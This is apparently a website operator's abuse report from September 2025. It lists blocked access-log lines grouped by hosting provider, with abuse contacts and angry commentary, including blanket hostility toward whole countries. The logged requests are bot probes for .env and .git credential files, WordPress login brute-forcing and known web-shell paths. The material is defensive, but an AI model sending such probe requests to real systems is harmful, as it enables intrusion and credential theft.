81.161.80.247 www.website*x.de – – [13/Sep/2025:11:04:08 +0200] „GET /wp-content/plugins/si-contact-form/captcha/securimage_show.php?prefix=AM7f4shF9H4aiXxV HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43“

MAIL NR. 5 SATURDAY

abuse@virtualine.org,admin@frantech.ca,fdias@frantech.ca,abuse@cheapy.host,

AS214940 – KPROHOST LLC – AGAIN AND AGAIN EVERY DAY!!! – VERY IGNORANT AND UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
– NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
198.55.98.93 website*x.de – – [13/Sep/2025:04:25:00 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/75.0.3770.103 Mobile/15E148 Safari/605.1“

AS53667 – FranTech Solutions – AGAIN AND AGAIN!!! – VERY IGNORANT AND UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
– NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
104.244.72.17 website*x.de – – [13/Sep/2025:10:16:49 +0200] „POST /wp-json/sure-triggers/v1/automation/action HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36“
104.244.72.17 website*x.de – – [13/Sep/2025:10:17:19 +0200] „GET / HTTP/1.0“ 403 – „http://www.google.com.hk“ „Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36“
104.244.72.17 website*x.de – – [13/Sep/2025:10:18:21 +0200] „POST /wp-json/sure-triggers/v1/automation/action HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36“
104.244.72.17 website*x.de – – [13/Sep/2025:10:19:02 +0200] „GET / HTTP/1.0“ 403 – „http://www.google.com.hk“ „Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36“

AS401120 – cheapy.host LLC – AGAIN AND AGAIN EVERY DAY!!! – VERY IGNORANT AND UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
– NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
196.251.80.146 website*x.de – – [13/Sep/2025:11:56:59 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
196.251.80.146 website*x.de – – [13/Sep/2025:11:56:59 +0200] „GET /wp-content/themes/seotheme/db.php?u HTTP/1.0“ 403 – „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
196.251.80.146 website*x.de – – [13/Sep/2025:11:56:59 +0200] „POST /wp-plain.php HTTP/1.0“ 302 – „www.google.com“ „Mozilla/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
196.251.80.146 website*x.de – – [13/Sep/2025:11:56:59 +0200] „POST /ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.0“ 403 – „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
196.251.80.146 website*x.de – – [13/Sep/2025:11:56:59 +0200] „POST /alfacgiapi/perl.alfa HTTP/1.0“ 403 – „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
196.251.80.146 website*x.de – – [13/Sep/2025:11:57:10 +0200] „GET /wp-content/themes/seotheme/db.php?u HTTP/1.0“ 403 – „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“

MAIL NR. 6 SATURDAY

abuse-reports@vpnconsumer.com,abuse@ipxo.com, abuse@contabo.de, noc@contabo.de, sascha.wintz@contabo.de, mail@proton66.ru,mansur@idc.md

AS3257 – GTT Communications Inc. – AGAIN AND AGAIN EVERY DAY!!! – VERY IGNORANT AND UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
– NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
203.188.183.31 website*x.com – – [13/Sep/2025:07:51:53 +0200] „GET /wp-includes/ID3/license.txt HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
203.188.183.31 website*x.com – – [13/Sep/2025:07:51:53 +0200] „GET /feed/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
203.188.183.31 website*x.com – – [13/Sep/2025:07:51:53 +0200] „GET /xmlrpc.php?rsd HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
203.188.183.31 website*x.com – – [13/Sep/2025:07:51:53 +0200] „GET /blog/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
203.188.183.31 website*x.com – – [13/Sep/2025:07:51:53 +0200] „GET /web/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
203.188.183.31 website*x.com – – [13/Sep/2025:07:51:53 +0200] „GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
203.188.183.31 website*x.com – – [13/Sep/2025:07:51:53 +0200] „GET /wp/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
203.188.183.31 website*x.com – – [13/Sep/2025:07:51:53 +0200] „GET /2020/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
203.188.183.31 website*x.com – – [13/Sep/2025:07:51:53 +0200] „GET /2019/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
203.188.183.31 website*x.com – – [13/Sep/2025:07:51:53 +0200] „GET /2021/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
203.188.183.31 website*x.com – – [13/Sep/2025:07:51:53 +0200] „GET /shop/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
203.188.183.31 website*x.com – – [13/Sep/2025:07:51:53 +0200] „GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
203.188.183.31 website*x.com – – [13/Sep/2025:07:51:53 +0200] „GET /test/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
203.188.183.31 website*x.com – – [13/Sep/2025:07:51:53 +0200] „GET /site/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
203.188.183.31 website*x.com – – [13/Sep/2025:07:51:53 +0200] „GET /cms/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“

AS51167 – Contabo GmbH – AGAIN AND AGAIN EVERY DAY!!! – VERY IGNORANT AND UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
– NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
164.68.102.93 website*x.com – – [13/Sep/2025:10:45:44 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.2277.83“
164.68.102.93 website*x.com – – [13/Sep/2025:10:45:44 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.130 Safari/537.36“
164.68.102.93 website*x.com – – [13/Sep/2025:10:45:44 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „https://www.google.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.2210.133“

AS198953 – Proton66 OOO – AGAIN AND AGAIN EVERY DAY!!! – VERY IGNORANT AND UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
RUSSIA IS VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES! – TO MANY HACKER-IDIOTS EVERY DAY!
45.135.232.10 website*x.com – – [13/Sep/2025:10:48:02 +0200] „GET /wp-login.php?wp_lang=en_US HTTP/1.0“ 403 – „https://website*x.com/wp-login.php“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0“

AS1547 – INTERDNESTRKOM – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
– NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
95.153.102.1 website*x.com – – [13/Sep/2025:10:48:11 +0200] „GET /wp-login.php?wp_lang=en_US HTTP/1.0“ 302 20 „https://website*x.com/wp-login.php“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36“

MAIL NR. 7 SATURDAY

abuse@microsoft.com,msftcs@microsoft.com,cert@microsoft.com,info@smartlink-isp.com,abuse@slt.lk

AS210413 – Smart Link Company for Internet Service – AGAIN AND AGAIN!!! – VERY IGNORANT AND UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
– NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
45.157.54.21 website*x.com – – [13/Sep/2025:11:16:25 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“
45.157.54.21 website*x.com – – [13/Sep/2025:11:16:25 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“

AS9329 – Sri Lanka Telecom Internet – VERY UNWANTED!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
– NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
220.247.224.162 website*x.com – – [13/Sep/2025:09:59:32 +0200] „GET /wp-content/plugins/WordPressCore/include.php HTTP/1.0“ 403 – „-“ „ShellBot 2.0“
220.247.224.162 website*x.com – – [13/Sep/2025:09:59:32 +0200] „GET /wp-content/plugins/WordPressCore-1/include.php HTTP/1.0“ 403 – „-“ „ShellBot 2.0“
220.247.224.162 website*x.com – – [13/Sep/2025:09:59:33 +0200] „GET /wp-content/themes/include.php HTTP/1.0“ 403 – „-“ „ShellBot 2.0“
220.247.224.162 website*x.com – – [13/Sep/2025:09:59:33 +0200] „GET /wp-content/plugins/include.php HTTP/1.0“ 403 – „-“ „ShellBot 2.0“
220.247.224.162 website*x.com – – [13/Sep/2025:09:59:33 +0200] „GET /wp-includes/images/include.php HTTP/1.0“ 403 – „-“ „ShellBot 2.0“
220.247.224.162 website*x.com – – [13/Sep/2025:09:59:34 +0200] „GET /wp-includes/widgets/include.php HTTP/1.0“ 403 – „-“ „ShellBot 2.0“
220.247.224.162 website*x.com – – [13/Sep/2025:09:59:34 +0200] „GET /wp-content/plugins/HelloDollyV2/hello_dolly_v2.php HTTP/1.0“ 403 – „-“ „ShellBot 2.0“
220.247.224.162 website*x.com – – [13/Sep/2025:09:59:35 +0200] „GET /wp-content/plugins/HelloDollyV2-1/hello_dolly_v2.php HTTP/1.0“ 403 – „-“ „ShellBot 2.0“
220.247.224.162 website*x.com – – [13/Sep/2025:09:59:35 +0200] „GET /wp-content/themes/hello_dolly_v2.php HTTP/1.0“ 403 – „-“ „ShellBot 2.0“
220.247.224.162 website*x.com – – [13/Sep/2025:09:59:35 +0200] „GET /wp-content/plugins/hello_dolly_v2.php HTTP/1.0“ 403 – „-“ „ShellBot 2.0“
220.247.224.162 website*x.com – – [13/Sep/2025:09:59:36 +0200] „GET /wp-includes/images/hello_dolly_v2.php HTTP/1.0“ 403 – „-“ „ShellBot 2.0“
220.247.224.162 website*x.com – – [13/Sep/2025:09:59:36 +0200] „GET /wp-includes/widgets/hello_dolly_v2.php HTTP/1.0“ 403 – „-“ „ShellBot 2.0“
220.247.224.162 website*x.com – – [13/Sep/2025:09:59:37 +0200] „GET /wp-content/plugins/HelloDollyV2_ncvt/hello_dolly_v2.php HTTP/1.0“ 403 – „-“ „ShellBot 2.0“

MAIL NR. 8 SATURDAY

hostmaster@twnic.tw,abuse@hinet.net,david.figueroa@codisert.com.co,zhaoyz3@chinaunicom.cn,oo@public.hh.nm.cn,hqs-ipabuse@chinaunicom.cn

AS17421 – Mobile Business Group – AGAIN AND AGAIN!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
– NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
221.120.4.43 website*x.com – – [13/Sep/2025:10:48:23 +0200] „GET /wp-login.php?wp_lang=en_US HTTP/1.0“ 403 – „https://website*x.com/wp-login.php“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36“

AS3356 – Level 3 Parent, LLC – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
– NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
170.238.239.59 website*x.com – – [13/Sep/2025:10:48:27 +0200] „GET /wp-login.php?wp_lang=en_US HTTP/1.0“ 302 20 „https://website*x.com/wp-login.php“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0“

AS4837 – CHINA UNICOM China169 Backbone – AGAIN AND AGAIN!!! – VERY IGNORANT AND UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
CHINA IS VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES! – TO MANY HACKER-IDIOTS EVERY DAY!
116.114.84.246 website*x.com – – [13/Sep/2025:10:48:38 +0200] „GET /wp-login.php?wp_lang=en_US HTTP/1.0“ 403 – „https://website*x.com/wp-login.php“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0“

MAIL NR. 9 SATURDAY

abuse@microsoft.com,msftcs@microsoft.com,cert@microsoft.com,abuse@ito.gov.ir

AS58224 – Iran Telecommunication Company PJS – AGAIN AND AGAIN!!! – VERY IGNORANT AND UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
IRAN IS VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES! – TO MANY HACKER-IDIOTS EVERY DAY!
2.191.6.136 website*x.com – – [13/Sep/2025:10:48:43 +0200] „GET /wp-login.php?wp_lang=en_US HTTP/1.0“ 302 20 „https://website*x.com/wp-login.php“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36“

MAIL NR. 10 SATURDAY

info@smartlink-isp.com,noc@perfectip.net,abuse@worldhost.group

AS210413 – Smart Link Company for Internet Service – AGAIN AND AGAIN!!! – VERY IGNORANT AND UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
– NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
45.157.54.21 www.website*x.de – – [13/Sep/2025:13:54:54 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“
45.157.54.21 www.website*x.de – – [13/Sep/2025:13:54:54 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“

AS199404 – WHG Hosting Services Ltd – VERY IGNORANT AND UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
– NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
195.250.21.212 www.website*x.com – – [13/Sep/2025:15:26:58 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64)“
195.250.21.212 website*x.com – – [13/Sep/2025:15:26:58 +0200] „GET /new/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64)“
195.250.21.212 website*x.com – – [13/Sep/2025:15:26:58 +0200] „GET /account/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64)“
195.250.21.212 website*x.com – – [13/Sep/2025:15:26:58 +0200] „GET /laravel/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64)“
195.250.21.212 website*x.com – – [13/Sep/2025:15:26:58 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64)“
195.250.21.212 website*x.com – – [13/Sep/2025:15:26:58 +0200] „GET /core/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64)“
195.250.21.212 website*x.com – – [13/Sep/2025:15:26:58 +0200] „GET /dash/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64)“
195.250.21.212 www.website*x.com – – [13/Sep/2025:15:26:58 +0200] „GET /core/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64)“
195.250.21.212 www.website*x.com – – [13/Sep/2025:15:26:58 +0200] „GET /laravel/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64)“
195.250.21.212 www.website*x.com – – [13/Sep/2025:15:26:58 +0200] „GET /new/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64)“
195.250.21.212 www.website*x.com – – [13/Sep/2025:15:26:58 +0200] „GET /admin/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64)“
195.250.21.212 www.website*x.com – – [13/Sep/2025:15:26:58 +0200] „GET /dash/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64)“
195.250.21.212 www.website*x.com – – [13/Sep/2025:15:26:58 +0200] „GET /account/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64)“
195.250.21.212 website*x.com – – [13/Sep/2025:15:26:58 +0200] „GET /admin/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64)“

AS22439 – Perfect International, Inc – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
– NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
THIS IS NOT THE GOOGLE-BOT!!! THIS IS A VERY STUPID HACKER-IDIOT! – UNSECURE PROVIDER!!!
70.36.120.125 www.website*x.com – – [13/Sep/2025:15:31:02 +0200] „GET /system/storage/logs/error.txt HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (compatible; Googlebot/2.1 +http://www.googlebot.com/bot.html)“
70.36.120.125 www.website*x.com – – [13/Sep/2025:15:31:02 +0200] „GET /system/logs/error.txt HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (compatible; Googlebot/2.1 +http://www.googlebot.com/bot.html)“
70.36.120.125 www.website*x.com – – [13/Sep/2025:15:31:02 +0200] „GET /storage/logs/error.txt HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (compatible; Googlebot/2.1 +http://www.googlebot.com/bot.html)“

MAIL NR. 11 SONNTAG

abuse@amazonaws.com, trustandsafety@support.aws.com,abuse@fasthosts.co.uk,google-cloud-compliance@google.com, network-abuse@google.com

AS16509 – Amazon.com, Inc. – VERY GOOD PROVIDER! – ALWAYS STOP THIS HACKER-IDIOTS!
ALWAYS ANSWERED IN OUR ABUSE EMAILS! THIS IS VERY GOOD!
3.109.58.23 website*x.com – – [14/Sep/2025:03:01:40 +0200] „GET /login HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
3.109.58.23 website*x.com – – [14/Sep/2025:03:01:40 +0200] „GET /wp-admin/index.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
3.109.58.23 website*x.com – – [14/Sep/2025:03:01:40 +0200] „GET /wp-admin HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
3.109.58.23 website*x.com – – [14/Sep/2025:03:01:40 +0200] „GET /admin.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
3.109.58.23 website*x.com – – [14/Sep/2025:03:01:40 +0200] „GET /wp-login HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
3.109.58.23 website*x.com – – [14/Sep/2025:03:01:40 +0200] „GET /admin HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
3.109.58.23 website*x.com – – [14/Sep/2025:03:01:40 +0200] „GET /dashboard HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
3.109.58.23 website*x.com – – [14/Sep/2025:03:01:40 +0200] „GET /user-login HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
3.109.58.23 website*x.com – – [14/Sep/2025:03:01:40 +0200] „GET /signin HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
3.109.58.23 website*x.com – – [14/Sep/2025:03:01:40 +0200] „GET /portal HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
3.109.58.23 website*x.com – – [14/Sep/2025:03:01:40 +0200] „GET /login.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
3.109.58.23 website*x.com – – [14/Sep/2025:03:01:40 +0200] „GET /secret HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
3.109.58.23 website*x.com – – [14/Sep/2025:03:01:40 +0200] „GET /enter HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
3.109.58.23 website*x.com – – [14/Sep/2025:03:01:40 +0200] „GET /admin-login HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
3.109.58.23 website*x.com – – [14/Sep/2025:03:01:40 +0200] „GET /panel HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
3.109.58.23 website*x.com – – [14/Sep/2025:03:01:40 +0200] „GET /adminpanel HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
3.109.58.23 website*x.com – – [14/Sep/2025:03:01:40 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
3.109.58.23 website*x.com – – [14/Sep/2025:03:01:40 +0200] „GET /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
3.109.58.23 website*x.com – – [14/Sep/2025:03:01:41 +0200] „GET /my-admin HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“

AS8560 – IONOS SE – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
– NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
77.68.123.43 website*x.com – – [14/Sep/2025:03:17:26 +0200] „GET /wp-admin HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
77.68.123.43 website*x.com – – [14/Sep/2025:03:17:26 +0200] „GET /wp-admin/index.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
